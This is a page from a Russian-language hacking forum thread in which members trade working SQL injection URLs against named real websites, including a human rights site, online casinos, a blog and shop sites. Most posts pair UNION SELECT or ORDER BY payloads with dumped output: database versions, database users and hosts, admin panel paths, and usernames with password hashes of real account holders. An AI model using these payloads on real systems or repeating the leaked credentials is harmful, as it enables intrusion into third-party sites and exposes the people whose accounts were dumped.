ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4161  
Старый 25.12.2007, 02:23
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Код HTML:
http://www.hro.org/get_rubric.php?id=-37+UNION+SELECT+1,version(),3,4,5,6,7/*
Код HTML:
http://www.hro.org/get_rubric.php?id=-37+UNION+SELECT+1,concat(user_id,0x3a,user_name,0x3a,password),3,4,5,6,7+FROM+user+LIMIT+0,1/*
1:semenov:6b19beeaedade171ecc320ddd87f7ae6::dancer
 
Ответить с цитированием

  #4162  
Старый 25.12.2007, 02:42
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Цитата:
http://www.seattlepokertournaments.com/casino.php?id=-25+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3,4,5,6,7,8,9,10,11,12,13/*
4.0.27-standard-log:db93557881:dbo93557881@74.208.16.119
 
Ответить с цитированием

  #4163  
Старый 25.12.2007, 02:52
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

2 Lesnoy_chelovek
Код:
http://www.latek.com.ua/index.php?page=produkt.php&subcat=99+union+select+1,2,3,log,5,pas,7,8+from+user/*
 
Ответить с цитированием

  #4164  
Старый 25.12.2007, 03:18
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Пройдёмся по казино.
Пять близнецов штоле? Не могу увидеть где выводится инфа. Ногами не бить- в скулях совсем зелен и несведущь.

Код HTML:
http://www.casinos-virtuels.net/description-casino.php?id=23+orde r+by+28/*
Код HTML:
http://www.casino-jeu.net/casino.php?id=54+order+b y+28/*
Код HTML:
http://www.annuaire-casino.net/casino.php?id=9+or der+by+28/*
Код HTML:
http://www.01-casino.com/casino.php?id=17+ order+by+28/*
Код HTML:
http://www.jeu-casino-online.com/casino.php?id=4+union+select+1 ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28/*
 
Ответить с цитированием

  #4165  
Старый 25.12.2007, 03:37
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

минусенг в параметре поставь и увидишь:
Цитата:
http://www.jeu-casino-online.com/casino.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #4166  
Старый 25.12.2007, 06:02
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://ballshooter.com/games/?c=category&category=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+partners/*
Код:
http://www.tctux.com/php/showContent.php?linkid=-6+union+select+VERSION()/*
Код:
http://www.7casinoonline.com/it/poker.php?ID=-1682+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11/*
Код:
http://www.jeu-casino-online.com/poker.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

Последний раз редактировалось SWAT; 25.12.2007 в 06:13..
 
Ответить с цитированием

http://www.big6.com/
  #4167  
Старый 25.12.2007, 09:41
4Dfx
Новичок
Регистрация: 06.12.2007
Сообщений: 11
Провел на форуме:
120052

Репутация: 30
Отправить сообщение для 4Dfx с помощью ICQ
По умолчанию http://www.big6.com/

Цитата:
http://www.big6.com/showarticle.php?id=-1+union+select+1,2,3,4,5/*
poll_user:
user_id
username
userpass
session
last_visit
Цитата:
http://www.big6.com/showarticle.php?id=-1+union+select+CONCAT(%20user_id,%20CHAR(32,58,32) ,%20username,%20CHAR(32,58,32),%20userpass),2,3,4, 5+from+poll_user/*
Админка http://www.big6.com/admin/
admin : d158b1d234953b66bfc119f17f800b7b
wp_users:
ID
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name
Цитата:
http://www.big6.com/showarticle.php?id=-1+union+select+CONCAT(ID,%20CHAR(32,58,32),user_lo gin,%20CHAR(32,58,32),user_pass,%20CHAR(32,58,32), %20user_email),2,3,4,5+from+wp_users/*
http://www.big6.com/blog/wp-login.php
admin : c49938ea11089d6a7783a28469b64edf
sue : e7e9ec3723447a642f762b2b6a15cfd7
laura : 73bc892f0b1ea86bf8e39656ad1e0d26
mike : bfd9f0cc586164634e1b9a255069ca5f
carrie : 2ccf2e8d12b57c2b2a58af053033dcd0
theresa : 85fb5505ee3d6f3976a00cb248822d38
 
Ответить с цитированием

  #4168  
Старый 25.12.2007, 11:05
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

www.100baz.ru

Код:
http://www.100baz.ru/info.php?id=54+AND+23%3d(SELECT+COUNT(table_name)+FROM+information_schema.tables)
Количество таблиц в базе (вместе со служебными таблицами information_schema.tables) - 23.
Юзерские таблицы:
bag
client
region
rubrika
t_news
tovar
 
Ответить с цитированием

Usera не подобрал pass:pass1234
  #4169  
Старый 25.12.2007, 12:37
JIyka
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018

Репутация: 25
Отправить сообщение для JIyka с помощью ICQ
По умолчанию Usera не подобрал pass:pass1234

http://www.lilstructuraldesign.ro/work.php?id=-1+union+select+1,2,3,concat_ws(0x3a,id,pass),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,5 8+from+users/*
 
Ответить с цитированием

  #4170  
Старый 25.12.2007, 13:17
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Если цензура будет не очень строгой, то будет видео по Франции

А пока...

artslivres.com
Код:
http://artslivres.com/ShowArticles.php?TypeAffichage=ParEditeur&NEdition=35&Editeur=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*
4.0.25-standard-log:artslivres001:artslivres001@10.0.65.166

etgarim.co.il - кто знает иврит - копайте глубже!
Код:
http://www.etgarim.co.il/showSection.php?id=-1+union+select+1,convert(concat_ws(0x3a,version(),database(),user())+using+latin1),3,4,5/*&type=game
4.1.11-standard:etgarim_db:etgarim_user@localhost

Юзеры:
Код:
http://www.etgarim.co.il/showSection.php?id=-1+union+select+1,convert(concat_ws(0x3a,username,password,email)+using+latin1),3,4,5+from+users+limit+0,1/*&type=game
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ